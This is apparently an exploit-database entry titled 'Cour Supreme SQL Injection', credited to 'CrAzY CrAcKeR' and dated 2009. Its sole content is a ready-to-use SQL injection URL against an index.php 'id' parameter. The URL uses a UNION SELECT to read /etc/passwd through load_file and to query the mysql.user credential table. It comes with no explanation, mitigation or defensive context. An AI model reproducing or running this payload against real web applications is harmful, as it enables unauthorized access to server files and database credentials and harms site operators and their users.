id: 9857
date: 09/23/2009
title: Cour Supreme SQL Injection
author: CrAzY CrAcKeR
cves: 

==========================
Cour Supreme SQL Injection
==========================

=================================================
 
Discovered By: CrAzY CrAcKeR
 
================================================
 
example:-
 
http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
 
================================================



#  0day.today [2023-03-26]  #